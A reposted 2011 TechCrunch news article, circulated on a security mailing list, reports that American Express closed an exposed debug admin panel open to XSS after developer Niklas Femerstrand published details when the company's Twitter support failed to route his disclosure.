Zero-Day Vulnerability On American Express Website Now Closed

[InfoSec News <alerts () infosecnews org>]

http://techcrunch.com/2011/10/06/zero-day-vulnerability-on-american-express-website-now-closed/

By Sarah Perez
TechCrunch
Oct 6, 2011

American Express say it shut down the webpage that left a portion of its 
website open for anyone to access in what’s being a called a zero-day security 
vulnerability, the company says in statement. The security issue was first 
discovered by developer Niklas Femerstrand, who attempted to reach out to 
American Express via Twitter in the hopes of being pointed to an email address 
he could use to send the company further details regarding the issue.

The seemingly confused Twitter rep asked him whether he was an Amex cardholder 
and offered him a phone number to call, despite his objections to contacting 
Amex via phone, fax or physical mail. In frustration, Femerstrand published the 
details to his blog instead.

According to the blog post (also featured here on Hacker News), Femerstrand 
discovered that American Express developers had accidentally left an 
administration panel for website debugging accessible, potentially leaving it 
open to XSS attacks.

“Hackers could inject a cookie stealer combined with jQuery’s .hide() and 
harvest cookies which can, ironically enough, be exploited by using the admin 
panel provided by sloppy American Express developers,” wrote Femerstrand on his 
blog post. He also demonstrated a proof-of-concept attack.

[...]

_____________________________________________________________
FINAL CALL to register #HITB2011KUL - Asia's premier
deep-knowledge network security event now in it's 9th year!
http://conference.hitb.org/hitbsecconf2011kul/